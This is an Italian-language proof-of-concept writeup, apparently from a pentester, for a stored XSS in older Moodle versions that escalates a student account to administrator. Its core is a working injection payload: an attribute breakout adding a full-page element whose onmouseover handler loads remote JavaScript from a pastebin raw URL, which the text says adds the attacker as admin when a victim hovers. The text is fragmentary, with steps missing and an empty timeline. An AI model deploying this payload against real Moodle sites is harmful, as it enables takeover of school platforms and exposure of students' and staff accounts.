
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC per Privilege Escalation (da Studente ad Amministratore)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS per Escalata dei Privilegi (Studente ad Amministratore). Questo è uno dei bug passati che ho scoperto durante un precedente pentest in un'istituzione accademica. All'epoca era abbastanza efficace da rubare praticamente l'accesso amministrativo e ottenere il controllo completo su Moodle usando un solo semplice bug.
Possiamo vedere dalla cronologia di git, il bug esisteva dalle vecchie versioni di Moodle (2003) ed è stato appena corretto nel 2019.
Cronologia:
SOLO A SCOPO EDUCATIVO. NON UTILIZZARE L'EXPLOIT PER ATTIVITÀ ILLEGALI. L'AUTORE NON È RESPONSABILE PER QUALSIASI USO IMPROPRIO O DANNO.
userid con il tuo id. Supponiamo che l'URL sia https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ o inserisci il link a quella pagina nel tuo post e attendi.Se ha successo, il tuo account verrà aggiunto come amministratore.